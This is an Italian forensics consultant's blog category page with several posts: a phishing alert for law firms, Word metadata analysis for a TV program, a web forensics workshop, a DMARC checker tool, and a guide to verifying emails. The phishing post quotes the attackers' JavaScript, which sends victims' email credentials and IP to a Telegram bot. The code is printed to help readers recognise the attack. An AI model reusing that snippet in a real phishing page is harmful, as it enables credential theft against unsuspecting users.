Archivi categoria: notizie

Attenzione al phishing che attacca le mailbox degli Avvocati

Un articolo che non parla d’informatica forense, come di consueto, ma è da leggere con attenzione e far girare in particolare tra gli avvocati: è importante saper riconoscere il phishing che sta colpendo gli studi legali italiani (e non solo) che porta a potenziali databreach a catena, dato che chi subisce l’attacco poi diventa vettore – verso i suoi contatti – di nuovi attacchi.

In questi giorni arrivano infatti agli avvocati email da parte di colleghi (ma anche clienti o collaboratori) che citano un documento di “Pagamento fattura” non allegato ma condiviso tramite OneNote, come mostrato nelle immagini allegate al post.

Email di phishing che arriva agli avvocati con un documento condiviso da aprire su OneNote

La mail ha come oggetto una frase tipo: “Studio Legale Associato XYZ ha condiviso la file Elementi condivisi il giorno 06-11-2025′ con te”.

Phishing ad avvocati e studi legali tramite falsa fattura condivisa su OneNote

Cliccando sul link si apre una pagina che indica che il documento contenente la fattura è crittografato ed è necessario loggarsi su Microsoft OneNote per accedervi:

"Avv. ABC - STUDIO LEGALE ASSOCIATO XYZ ho condiviso un nuovo documento con te
Pagamenti delle fattura.pdf(601 KB)
VISUALIZZARE IL DOCUMENTO CONDIVISO

Il documento è crittografato con password Microsoft, accedi con l'indirizzo e-mail in cui è stato ricevuto il documento.
Questo documento è stato analizzato alla ricerca di virus dal software Norton™ AntiVirus Security Standard 2025
© Condivisione di file Microsoft 2025"

Cliccando sul link “Visualizzare il documento condiviso” si giunge a una pagina con diversi login.

Phishing ad avvocati tramite condivisione fattura OneNote di Microsoft e furto credenziali username e password

E’ possibile inserire il proprio login con username e password per ogni tipo di account di posta elettronica che si possiede, partendo dai principali come Office365, Outlook, Rackspace, Aruba, PEC o anche altri account:

Accedi alla tua e-mail per visualizzare il documento condiviso.
Accedi qui sotto.
Accedi con Office365
Accedi con Outlook
Accedi con Rackspace
Accedi con Aruba Mail
Accedi con PEC
Accedi con Altra Posta

Inserendo le proprie credenziali ai vari link, queste vengono inviate agli attaccanti tramite una chiamata API a un bot Telegram:

forma.addEventListener("submit", e =>{ e.preventDefault(); let email = document.querySelector('#e-mail').value let pwd = document.querySelector('#pwd').value let ips = document.querySelector('#ipaddress').value fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Email:${email}=Password:=${pwd}=IP:=${ips}`, { method: "GET" }).then(success => { window.location.replace("https://www.onenote.com/"); }, error => { alert("Message not sent") console.log(error) })

In sostanza, gli attaccanti, per scaricare il file chiedono d’inserire su un finto sito Microsoft username e password di posta (Office365, Outlook, Rackspace, Aruba S.p.A., PEC o anche qualunque altra) ma ovviamente una volta loggati invece di mostrare la fattura:

1) gli attaccanti entrano nell’account di posta dello Studio;

2) se hanno tempo e voglia scaricano i messaggi e gli allegati;

3) scaricano la rubrica e inviano a tutti i contatti la stessa mail ricevuta sperando che anche loro si facciano trarre in inganno..

Le email che arrivano sono originali e autentiche, inviate dal vero account del collega avvocato, non sono spoofing e tendono a passare i controlli antispam, quindi l’unica prevenzione è non inserire la password al link con il documento condiviso. Se cliccate su link e andate avanti senza inserire credenziali non succede nulla.

Se avete già inserito user/password, gli attaccanti stanno potenzialmente scaricandosi i vostri messaggi, la rubrica e inviando ai vostri contatti lo stesso messaggio: cambiate subito password, loggatevi sulla webmail per chiudere eventuali altre sessioni aperte, attivate 2FA se già non lo avete, valutate se informare i contatti di non aprire link da voi ricevuti, se volete capire cosa hanno fatto gli attaccanti nel vostro account scaricate/chiedete i file di log del provider.

Se avete ricevuto mail simili a quelle allegate al post quindi cancellatele anche se provengono da colleghi oppure se avete voglia inviatemi il file EML che ne sto collezionando diversi per analizzare come il phishing sta diffondendosi tra i professionisti e quali tecniche utilizzano gli attaccanti per rendere credibile il phishing.

Analisi forense di pendrive USB e metadati Word per Le Iene

Martedì 4 novembre 2025 è andato in onda il servizio de Le Iene dove, come perito forense, ho aiutato la Iena Filippo Roma a trovare riferimenti a potenziali autori all’interno di una pendrive USB contenente un documento Word.

Il servizio de Le Iene parla di una questione nella quale non mi addentro, poiché mi è stato semplicemente chiesto se fosse possibile trovare l’autore, il proprietario o l’utilizzatore di una pendrive USB, in particolare basandomi su di un documento Microsoft Office Word in essa contenuto.

Consulente Informatico per Le Iene su analisi metadati pendrive USB

L’attività di perizia informatica è iniziata con la realizzazione di una copia forense della pendrive USB – così da cristallizzarne e preservarne il contenuto all’interno di una immagine forense con estensione EWF, in modo da poterla successivamente analizzare.

L’analisi forense svolta come perito informatico per Le Iene – in particolare per Filippo Roma e l’autore del servizio TV – è stata eseguita tramite il software X-Ways Forensics, con il quale ho eseguito carving, recupero dati e ricostruzione del filesystem, inclusi file cancellati e relativi metadati EXIF di immagini, OOXML di file Word e XMP di file PDF.

Le Iene - Paolo Dal Checco e analisi forense su metadati di documento Word

Il software XWF – X-Ways Forensics – permette a chi opera come consulente informatico forense di eseguire attività di analisi e perizia informatica su immagini forensi al fine di ricostruire file eliminati e categorizzare metadati ed evidenze digitali

Come contro-verifica – in ambito informatica forense è sempre importante l’attività di cross examination – ho utilizzato anche il noto software open source Exiftool, così da poter confermare le risultanze ottenute mediante il tool forense XWF e produrre quindi una valutazione circa l’attribuzione del file.

Paolo Dal Checco - Perito Informatico per Le Iene e analisi dei metadati file word con exiftool

Nella pendrive erano presenti ulteriori file di tipo “.Trashes”, “.TemporaryItems”, “.Spotlight-V100” con i subfolder “Store-V2” e all’interno i vari journal e index, ma in nessuno di tali artefatti erano contenute indicazioni circa l’attribuzione della pendrive o meglio, si sono trovati gli stessi riscontri presenti nel file Word oggetto di analisi.

Dal punto di vista informatico forense, la presenza di uno specifico nominativo nel campo “Creator/Author” o “Last Modified By/Last Saved By” non indica necessariamente l’autore del documento o dell’ultima modifica ma il nominativo con cui è stato configurato il software utilizzato per generare il documento Word.

In genere, quindi, quando si rileva un nominativo nel campo autore del documento o dell’ultima modifica al documento in un file Word – ma anche Excel o Powerpoint, oltre a PDF o eventuali file JPG, multimediali, etc… – possono verificarsi tre situazioni:

  1. Il nominativo presente nei dati EXIF/XMP/OOXML può effettivamente essere l’autore del documento;
  2. Lo user indicato nei metadati del file Word può essere quello con cui è stato configurato il sistema utilizzato per creare o modificare il file ma il file non è stato creato/modificato da tale soggetto;
  3. Lo username reperibile nei meta dati può essere stato inserito apposta nel file da terzi per forzare l’attribuzione di un file a un soggetto (es. per attribuirgli la creazione/modifica del file).

Ovviamente dall’analisi forense di un solo file non è possibile distinguere con una perizia informatica in quale casistica di quelle riportate sopra rientri, se non esaminando ulteriori elementi (es. altri file presenti sul dispositivo, percorsi/path del filesystem lasciati nei file, negli indici o nei dati temporanei, etc…) e quindi non si possono fare ulteriori valutazioni.

Proprio per questo motivo è importante procedere con la massima cautela quando si ricavano informazioni dai metadati dei file, valutando le possibili interpretazioni in base a ulteriori elementi, anche investigativi, che possano confermare o meno l’attendibilità dell’attribuzione.

Workshop su Web Forensics e Indagini Digitali per MSAB a Roma

Come si acquisisce in maniera forense una pagina web? Come si cristallizza un post Instagram o un commento ricevuto su Facebook per fini giudiziari? Se stampo una mail in PDF ha valore legale come prova digitale in Tribunale?

Queste e altre domande troveranno risposta nel talk sulla Web Forensics che terrò insieme al collega Andrea Lazzarotto giovedì 6 novembre 2025 a Roma nell’ambito del workshop organizzato da MSAB intotolato “Nuovi Orizzonti per le Indagini Digitali Forensi: Sfide e Soluzioni”.

Seminario MSAB a Roma - Nuovi Orizzonti per le Indagini Digitali Forensi

Relatori evento MSAB a Roma

L’evento, organizzato in collaboration con Nuix, SANS Institute and eTrace Digital Security, si terrà in presenza presso l’UNA HOTELS Hotel Empire dalle 8:30 alle 18:30 e prevede talk di altissimo livello su argomenti d’informatica forense e mobile forensics con l’intervento dei seguenti professionisti:

  • Mattia Epifani, CEO di Reality Net, consulente informatico forense, esperto in attività di Digital Mobile Forensics, docente certificato SANS, docente universitario, autore e divulgatore, con l’intervento: “Not So Private Browsing!”
  • Paolo Dal Checco, Consulente informatico forense, esperto in attività di Digital Mobile Forensics, analisi di OSINT, malware e criptovalute, docente universitario, autore e divulgatore, insieme a
  • Andrea Lazzarotto, Consulente informatico forense, esperto in attività di Digital Mobile Forensics, ricercatore, sviluppatore, con l’intervento: “Web Forensics: Le Nuove frontiere delle Prove Digitali”
  • Roberto Murenec, Maresciallo in forza al Comando Provinciale della Guardia di Finanza di Pordenone, autore, divulgatore e esperto di Digital Forensics e relativa regolamentazione legislativa, insieme a
  • Pier-Luca Toselli, Luogotenente Carica Speciale in forza al Comando Provinciale della Guardia di Finanza di Bologna, esperto di Digital Forensics e relativa regolamentazione legislativa, con l’intervento: “Perquisizione e Sequestro del Dispositivo “Mobile” Tra Rispetto delle Regole Processuali e delle Garanzie di Parte”
  • I responsabili di E-Trace, rivenditore esclusivo MSAB per il territorio italiano.
  • Manlio Longinotti, Responsabile Italia SANS, con l’intervento: “SANS DFIR Trainings: La Formazione Oltre l’Aggiornamento”
  • Dario Beniamini, GCFA, GCFE, GOSI, CFIP, CIFI, Esperto in proprietà intellettuale e tutela dei marchi, DFIR, NUIX Senior Consultant, docente certificato SANS, con l’intervento: “Rethinking Digital Investigations: Beyond Keyword Searches”
  • Ghennadii KONEV, con l’intervento: “Non Solo FFS, Estrazioni Fisiche BFU con XRY”
  • Giovanni Maria Castoldi, MSAB North Mediterranean Area Sales Manager.
Workshop sulle indagini digitali forensi per MSAB a Roma - Novembre 2025

Workshop sulla Web Forensics e le Indagini Digitali

Nel mio intervento, insieme ad Andrea Lazzarotto, parleremo di un tema sempre più centrale nelle indagini digitali: la Web Forensics, ovvero l’insieme di tecniche e metodologie per acquisire, preservare e analizzare prove provenienti dal web come siti web, pagine web, servizi online, piattaforme cloud, API, social network e applicazioni mobili.

Spesso le indagini digitali si concentrano su dispositivi fisici, ma oggi una parte sempre più significativa delle evidenze si trova “fuori” dal computer, nel cloud o su piattaforme web in continua evoluzione. Da qui nasce la necessità della webforensics, cioè quella di rendere l’acquisizione forense di risorse web affidabile, ripetibile e non disconoscibile, al pari di quella tradizionale.

Web Forensics - Paolo Dal Checco e Andrea Lazzarotto - Roma 2025

Durante il talk sulla Web-Forensics mostreremo come costruire una macchina virtuale forense per l’acquisizione di pagine e contenuti web, documentando ogni passaggio (traffico di rete, video, log, certificati, riferimenti temporali, ecc.), come cristallizzare l’ambiente e i risultati con tecniche di hashing, timestamping e marca temporale e come utilizzare strumenti open source specifici per l’acquisizione e la verifica, come FIT (Freezing Internet Tool) e Fuji, sviluppati per garantire integrità, catena di custodia e trasparenza nelle operazioni di copia e analisi.

Parleremo anche di acquisizioni di contenuti “complessi”, come flussi video o chiamate API, oltre che di come intercettare e documentare correttamente il traffico HTTPS o REST attraverso strumenti utilizzabili in ambito web forensics come mitmproxy.

Le slide dell’intervento sulla Web Forensics sono visionabili e scaricabili gratuitamente in download dalla sezione qui di seguito.

Web Forensics e Indagini Digitali – Paolo Dal Checco e Andrea Lazzarotto – @MSAB Roma 2025Download

Infine, a latere – poiché non si tratta di webforensics pura – discuteremo delle nuove sfide legate all’acquisizione forense dei dispositivi Mac con chip Apple Silicon, che richiedono un cambio di paradigma simile a quello già affrontato nel mondo mobile.

L’obiettivo del workshop sulla Web Forensics è mostrare un metodo pratico e ripetibile per affrontare in modo rigoroso e documentato la cristallizzazione di prove digitali web, in linea con i principi della Legge 48/2008, della ISO/IEC 27037 e delle best practice internazionali.

Agenda dell’evento MSAB a Roma

L’evento che si terrà giovedì 6 novembre 2025 a Roma nell’ambito del workshop organizzato da MSAB intotolato “Nuovi Orizzonti per le Indagini Digitali Forensi: Sfide e Soluzioni” seguirà la seguente agenda dei lavori:

  • 8:45 Registrazione Partecipanti
  • 9:30 Introduzione
  • 9:45 Ghennadii Konev & Giovanni Maria Castoldi con l’intervento: “Non Solo FFS, Estrazioni Fisiche BFU con XRY
  • 10:30 Coffee Break
  • 10:45 Mattia Epifani con l’intervento: “„”Not So Private Browsing!
  • 11:45 Dario Beniamini con l’intervento: “Rethinking Digital Investigations: Beyond Keyword Searches
  • 12:30 Paolo Dal Checco & Andrea Lazzarotto con l’intervento: “Web Forensics: Le Nuove frontiere delle Prove Digitali
  • 13:15 Pranzo
  • 14:30 Manlio Longinotti con l’intervento: “SANS DFIR Trainings: La Formazione Oltre l’Aggiornamento
  • 15:00 Pier Luca Toselli & Roberto Murenec con l’intervento: “Perquisizione e Sequestro del Dispositivo Mobile“ Tra Rispetto delle Regole Processuali e delle Garanzie di Parte“
  • 15:45 Coffee Break
  • 16:00 Intervento E-Trace
  • 16:45 Q&A, Demo
  • 18:00 Termine

DMARC Forensics: un tool per verificare la compliance ed evitare problemi di spoofing

Quanto è facile inviare un messaggio di posta elettronica a nome di altri? La risposta è che è facilissimo, ci sono persino siti tipo Emkei o AnonyMailer che permettono a chiunque di scrivere messaggi apparentemente provenienti da indirizzi di posta di terzi, inclusi potenzialmente gli indirizzi PEC, che ovviamente non possono essere utilizzati per invio PEC tramite spoofing ma esclusivamente PEO.

Il punto è che il server dell’account email del ricevente ha modo di verificare se il messaggio proviene effettivamente dall’indirizzo del mittente oppure è stato inviato tramite email spoofing e quindi decidere di scartarlo o mandarlo in spam, eventualmente segnalando al server del dominio del mittente l’anomalia.

Affinché ciò avvenga è però essenziale che il dominio del mittente sia correttamente configurato, a livello DNS e server di posta, per indicare il corretto record DMARC, SPF ed eventuale chiave pubblica DKIM (in tal caso il messaggio deve poi essere anche firmato tramite DKIM) così da permettere al server ricevente di fare le opportune verifiche.

DMARC Forensics, una soluzione per verificare la configurazion DMARC

Prendendo spunto dal post Linkedin di Andrea Draghetti sulla configurazione del server di Poste Italiane che a giugno 2025 ha evidenziato come il server supportasse SPF ma nessuna non vi fosse traccia di DKIM e DMARC, dopo aver rivisto il video di Francesco Guiducci e Raffaele Colavecchi che spiegano come configurare SPF, DKIM e DMARC che illustrano come proteggere la posta elettronica (e la propria reputazione) tramite una opportuna configurazione del protocollo DMARC, DKIM e SPF, con un occhio alle raccomandazioni dell’Agenzia per la Cybersicurezza Nazionale ACN sul Framework di Autenticazione della posta elettronica ho scritto un semplice script di DMARCForensics per verificare la conformità DMARC dei domini, che potete trovare pubblicamente sul sito DMARC Forensics.

DMARC Forensics Tool - DMARC Compliance Checker and Inspector with Report and Fix

Esistono decine di dmarc checker tool, il tool di DMARC Forensics che ho sviluppato non differisce di molto dagli altri però potete usarlo con liste di domini e con la consapevolezza che non caricate alcun dato sul server: tutto gira in locale sul vostro browser.

Ho testato con il DMARC Forensics tool alcuni domini istituzionali utilizzati per invio posta elettronica, parte dei quali risultano ben configurati, altri meno, alcuni per nulla, in generale l’80% dei domini è ben configurato e quelli con problemi sul record DMARC non è detto che poi non firmino comunque i messaggi tramite DKIM o supportino SPF.

Non andrebbero ovviamente ignorati i domini che non inviano posta, tratteremo più aventi la questione di siti o domini istituzionali che non vengono usati per invio di messaggi di posta elettronica e che quindi possono essere utilizzati per inviare mail impersonando tali istituzioni mediante spoofing senza alcun controllo sull’autorità del dominio.

Integrerò più avanti verifica SPF e DKIM (con selector fornito dall’utente o bruteforced) oltre che permettere la cristallizzazione forense dei record tramite web forensics così da preservarne lo stato DMARC (ma anche DKIM ed SPF) per eventuale uso legale, al momento è possibile comunque scaricare in formato TXT il log delle query e in XLSX la tabella.

Ricordiamo infatti quanto, nei casi di Man in The Mail (i casi dei bonifici fraudolenti ottenuti tramite cambio IBAN da parte degli attaccanti) può essere strategica una valutazione forense della configurazione DMARC, una verifica delle firme DKIM, un test dei requisiti SPF per rappresentare correttamente ai legali eventuali responsabilità nella truffa informatica subita dalla vittima.

Il tool “DMARC Forensics” è molto “severo” ed evidenzia note o commenti anche per i domini che risultano conformi, come ad esempio la presenza di record multipli, il mancato allineamento con sottodomini o la policy eccessivamente permissiva o ambigua: in tal caso nella colonna “Fix” viene indicato come rimediare.

Qui di seguito si possono osservare i risultati del sito DMARC Forensics dove ho offuscato i domini non compliant, anche perché alcuni – pur non avendo DMARC configurato – firmano comunque i messaggi con DKIM (seppur talvolta senza alignment al domain) e rispettano policy SPF, quindi la mancata configurazione DMARC è un problema minore.

DMARC Forensics - Siti governativi e istituzionali italiani

Il motivo dell’oscuramento e redact è che non ritengo corretto che i domini non conformi vengano presentati con accezione negativa, anche purtroppo un dominio non solo non ha record DMARC configurato ma restituisce il record SPF al suo posto e come ciliegina sulla torta non firma neanche con DKIM le email inviate.

DMARC Forensics, istruzioni per l’uso

Il DMARC Forensics – Compliance Checker è uno strumento web gratuito e avanzato, progettato per analizzare la configurazione DMARC (Domain-based Message Authentication, Reporting, and Conformance) di uno o più domini. Creato per essere semplice, veloce e sicuro, il tool opera interamente lato client, garantendo che nessun dato inserito dall’utente venga trasmesso o memorizzato su server esterni, nel pieno rispetto della privacy.

Il tool DMARC Forensics è semplice da utilizzare, è sufficiente inserire nel campo di testo un elenco di domini, uno per riga o separati da due punti o punto e virgola e le sue caratteristiche principali sono le seguenti:

  1. Analisi Multi-Dominio: L’applicazione consente agli utenti di inserire un elenco di domini (fino a 20 per volta, per evitare saturazione lato client) in un’unica interfaccia. Questo permette di effettuare controlli massivi in modo efficiente, ideale per amministratori di sistema che gestiscono molteplici proprietà web.
  2. Validazione Sintattica: Prima di avviare le query DNS, il tool esegue una validazione preliminare sui nomi di dominio inseriti per verificare che rispettino gli standard RFC, segnalando all’utente eventuali errori di formattazione.
  3. Interrogazione DNS Client-Side: Utilizzando l’API pubblica di Google DNS, lo script interroga il record TXT _dmarc per ciascun dominio. Tutta l’operazione avviene direttamente nel browser dell’utente, assicurando la massima privacy e velocità.
  4. Analisi Dettagliata della Conformità: Il cuore del tool è il suo motore di analisi. Non si limita a verificare l’esistenza del record, ma esamina ogni direttiva DMARC secondo le best practice di sicurezza. I risultati sono classificati con un sistema di colori intuitivo:
    • Compliant (Verde): Il record è valido e applica una policy restrittiva (quarantine o reject) senza problemi significativi.
    • Compliant with notes (Verde-giallo): Il record è valido ma presenta criticità minori che non ne compromettono l’efficacia (es. alignment rilassato, policy p=none, mancate autorizzazioni per i report esterni).
    • Not compliant (Rosso): Il record presenta errori fatali (es. più record DMARC, sintassi errata, policy mancante).
    • Not configured (Rosso): Nessun record DMARC trovato.
  5. Note e Soluzioni (FIX): Per ogni problema rilevato, il tool fornisce una spiegazione chiara nella colonna “Notes” e un suggerimento pratico su come risolverlo nella colonna “FIX”. Questo trasforma l’analisi da un semplice controllo a una guida operativa.
  6. Export dei Dati: I risultati possono essere esportati in due formati:
    • Report XLS: Un file Excel che riproduce la tabella dei risultati, mantenendo la formattazione a colori per una facile consultazione e archiviazione.
    • Log TXT: Un file di testo dettagliato contenente le query DNS esatte inviate e le risposte JSON complete ricevute, ideale per analisi forensi e debugging tecnico.

A Chi si Rivolge il DMARC Forensics tool

Questo strumento è pensato per un’ampia gamma di professionisti e tecnici informatici:

  • Amministratori di Sistema e DevOps: Per verificare e mantenere la corretta configurazione DMARC sui domini aziendali;
  • Professionisti della Sicurezza Informatica: Per condurre audit di sicurezza sulla posta elettronica e identificare vulnerabilità legate a spoofing e phishing;
  • Consulenti di Informatica Forense: Per acquisire rapidamente dati sulla configurazione DMARC durante un’indagine e cristallizzarne – a breve – lo stato a uso legale in perizie informatiche forensi, ad esempio in casi di Man in The Mail (MITM);
  • Webmaster e Proprietari di Domini: Per assicurarsi che il proprio dominio sia protetto e che le comunicazioni via email siano affidabili.

Attenzione che funzionando lato client e utilizzando per le informazioni DNS le API di Google (https://dns.google/resolve) può non fornire risultati se lo si utilizza da IP con bassa reputazione come VPN o Tor.

Verifica di email originali o contraffatte per Le Iene

Domenica 21 settembre 2025 è andato in onda su ItaliaUno di Mediaset il servizio de Le Iene nel quale come consulente tecnico e perito informatico forense ho aiutato la Iena Filippo Roma a capire se dei messaggi di posta elettronica ricevuti fossero originali integri oppure manipolati e falsi.

Paolo Dal Checco, Perito Informatico Forense per Le Iene nel servizio di Filippo Roma

La domanda cui ho risposto è stata quella che tipicamente viene posta nei quali vengono prodotte come prova informatica delle email, cioè “Come posso verificare se una mail è autentica e originale oppure se è stata manipolata ed è quindi falsa?”.

Senza entrare nel merito del contesto nel quale non è opportuno che mi pronunci – essendo un perito informatico forense e non un giurista – nel servizio andato in onda su Mediaset, come Consulente Informatico de Le Iene ho analizzato alcuni messaggi di posta elettronica ricevuti da una persona, che erano stati disconosciuti e dichiarati falsi da un’altra.

Come consulente informatico per Le Iene ho condotto l’analisi non su stampe cartacee o pdf dei messaggi – assolutamente da evitare come prova digitale perché possono essere creati o manipolati artificiosamente – bensì sul dato “grezzo”, cioè sui messaggi completi di header RFC822 che tipicamente vengono esportati da webmail o programmi di posta in formato EML, MSG o TXT.

Per fare un esempio, questo è ciò su cui si può basare una perizia informatica su email con valutazione dell’integrità di un messaggio di posta elettronica.

Intestazione RFC822 di un messaggio di posta elettronica o header RFC822

Come Consulente Informatico de Le Iene ho quindi proceduto alla verifica dell’originalità o manipolazione di mail fornite al fine di confermare che non si trattasse di falsi creati con Photoshop o email manipolate per modificarne il contenuto.

Il Consulente Informatico de Le Iene Paolo Dal Checco verifica originalità o manipolazione di una mail

Partendo dal “codice sorgente” di un messaggio, avendo ove possibile anche accesso alla mailbox, è possibile infatti operare diverse analisi, tra le quali l’analisi della firma DKIM apposta dal server sulle email inviate.

Il protocollo DKIM (DomainKeys Identified Mail) permette ai server mittente di apporre una firma digitale su specifici campi della mail (mittente, destinatario, oggetto, data e altri campi ma soprattutto sul testo. Un controllo positivo garantisce che né i campi né il testo siano stati alterati dopo l’invio o siano comunque originali. Un’email creata artificiosamente impostando come mittente un indirizzo Gmail, ad esempio, non può essere firmata dal server Google e quindi la verifica DKIM risulterà negativa.

Verifica di email tramite DKIM con tecniche d'informatica forense

In aggiunta, ARC (Authenticated Received Chain) fornisce ulteriori garanzie sulla catena di inoltro del messaggio di posta elettronica, dato che spesso le mail vengono inoltrate tramite forward o gestite mediante liste d’inoltro.

L’analisi forense delle firme DKIM permette di verificare eventuale manipolazione, falsificazione o spoofing dei messaggi di posta elettronica. lo spoofing consiste nella impersonificazione d’indirizzi email di terzi creando mail inviate apparentemente forgiate con il mittente “falso”, così che chi riceve i messaggi sia persuaso di averli ricevuti dai mittenti immediatamente visibili nell’intestazione “Da” o “From” mentre invece sono messaggi di posta falsificati e artefatti ad hoc.

Esistono diversi servizi che permettono d’inviare “spoofed email”, cioè email con mittente che impersona un indirizzo di terzi, uno dei più noti è Emkei, utilizzabile da chiunque per provare a inviare una mail con il proprio indirizzo e verificare se a destinazione l’email viene scartata o accettata dalla mailbox. Nell’ambito delle truffe informatiche molto spesso poi vengono spesso direttamente modificate le email nella mailbox di ricezione, stampate o artefatte senza necessità di utilizzare la tecnica dello spoofing.

Esistono diversi metodi per la verifica della firma DKIM nelle email, per valutarne l’integrità e l’originalità, quello mostrato nel servizio dove ho svolto l’attività di consulente informatico per Le Iene è il servizio MXtoolbox Email Header Analyzer.

Verifica di manipolazione o falsificazione di messaggi di posta elettronica

MXtoolbox è una suite di servizi dedicati alla posta elettronica e da di essi si trova l’analizzatore d’intestazioni – o header – RFC 822. Si tratta di un servizio online sul quale è possibile incollare nel campo di testo l’intestazione di un messaggio di posta elettronica ma in realtà la verifica completa può essere operata soltanto incollando l’intero contenuto del sorgente del messaggio di posta, non soltanto l’header.

Una volta incollato il contenuto del codice sorgente messaggio (integralmente, non soltanto l’header) si otteranno delle spunte in corrispondenza delle varie verifiche SPF, DMARC e DKIM.

Verifica originalità messaggio email tramite analisi SPF DMARC e DKIM dell'header

In base alle spunte verdi è possibile valutare se i vari parametri sono corretti e in particolare se la firma DKIM risulta verificata e quindi autentica in base al selector indicato nel messaggio stesso, cioè al riferimento del dominio che ha inviato o gestito l’invio del messaggio di posta elettronica, che deve ovviamente coincidere con quello del mittente.

Verifica se una email è originale o falsa tramite firma DKIM

Nel caso migliore tutte le spunte interne alla verifica DKIM sono verdi, a significare che l’email è originale, autentica ed effettivamente inviata dall’indirizzo che risulta essere indicato nel campo mittente.

Accedendo direttamente alla mailbox, è poi possibile estrarre la data di ricezione interna (INTERNALDATE) e l’identificativo univoco (UID) assegnato dal server a ogni messaggio: le incoerenze – soprattuto con altri messaggi inviati o ricevuti nella stessa giornata – possono suggerire manipolazioni o importazioni sospette di messaggi.

Non va sottovalutato poi il campo Message-ID è un identificatore unico che dovrebbe seguire logiche ben precise, spesso legate al dominio mittente o a timestamp codificati. Confrontare il Message-ID con campi come In-Reply-To consente di scoprire anomalie nella ricostruzione del thread.

Confrontare più messaggi appartenenti alla stessa conversazione consente inoltre di notare discrepanze nei riferimenti temporali o negli identificativi dei messaggi, segnalando possibili manipolazioni. Allo stesso modo, gli header contengono date in diversi formati, inclusi quelli basati su EpochTime. Incoerenze tra i vari timestamp possono rivelare alterazioni o inserimenti anomali nel flusso delle comunicazioni.

La struttura multipart MIME di un messaggio può contenere testo semplice, HTML, immagini inline e allegati. Analizzare i MIME boundaries permette di scoprire manipolazioni, omissioni o inserimenti sospetti.

Gli allegati, a loro volta, possono essere sottoposti a analisi forense: metadati EXIF in immagini o documenti Office possono rivelare autori, software utilizzati o date di creazione non coerenti con quanto dichiarato.

Infine è strategico, per verificare se un messaggio di posta elettronica è originale o alterato, non sottovalutare i campi TO, CC e BCC: è infatti possibile individuare destinatari ulteriori, contattarli e acquisire copie indipendenti dello stesso messaggio rafforza l’attendibilità dell’analisi.

In ultimo, in ambito d’indagine informatica e OSINT, è importante verificare se nei messaggi EML o MSG sono presenti campi personalizzati detti X-Fields, che possono fornire indizi preziosi sul percorso di consegna, sullo spam scoring o sul software utilizzato, talvolta persino sull’indirizzo IP del mittente.

Perché serve la copia forense della mailbox

Tutte queste analisi hanno un punto in comune: non possono essere eseguite su una semplice stampa PDF o uno screenshot. Per una perizia informatica solida e incontestabile né disconoscibile è necessario acquisire quantomeno i messaggi di posta con i loro header RFC822 completi (cioè il file TXT, EML o MSG integrale) ma è raccomandabile poter procedere tramite copia forense della mailbox all’estrazione diretta dal cloud anche dei metadati.

Le tecniche di email forensics richiedono infatti che le email o la mailbox oggetto di analisi siano il più possibile complete di header rfc822, metadati, dettagli e log tipicamente presenti all’interno di una copia forense, un takeout o una esportazione forense dei dati sui quali successivamente operare una analisi forense.

Solo così si può attribuire – talvolta, non sempre – integrità probatoria anche in assenza di firme DKIM e si può ricostruire con precisione il ciclo di vita del messaggio.

A cosa serve la perizia informatica sulle mail e quanto costa?

Dal servizio de Le Iene per il quale ho fatto da consulente tecnico e perito informatico per illustrare come riconoscere un messaggio di posta elettronica vero e originale da uno falso e artefatto emerge chiaramente l’importanza di una perizia informatica di acquisizione forense e analisi dei messaggi in ambito di dispute ove esistono prove digitali consistenti in email o PEC.

Consigliamo quindi, in ambito di processi penali o civili, di conferire incarico a un professionista – ad esempio un consulente informatico forense – per l’esecuzione di copia forense a valore legale e per utilizzo in Tribunale dei messaggi di posta elettronica, con successiva analisi, validazione e certificazione dell’originalità e integrità dell’intestazione header RFC822 e del contenuto.

Per questo motivo, la perizia informatica sulle mailbox resta uno strumento essenziale non solo in tribunale, ma anche in contesti aziendali e investigativi dove la verità di un messaggio può fare la differenza.

Nell’era in cui le e-mail rappresentano prove cruciali in indagini penali, civili e commerciali, affidarsi a verifiche superficiali può infatti compromettere l’intero procedimento. L’analisi forense delle e-mail non si limita a leggere un testo, ma entra nei dettagli tecnici più nascosti per stabilire, con metodo scientifico, se un messaggio sia autentico, integro e affidabile.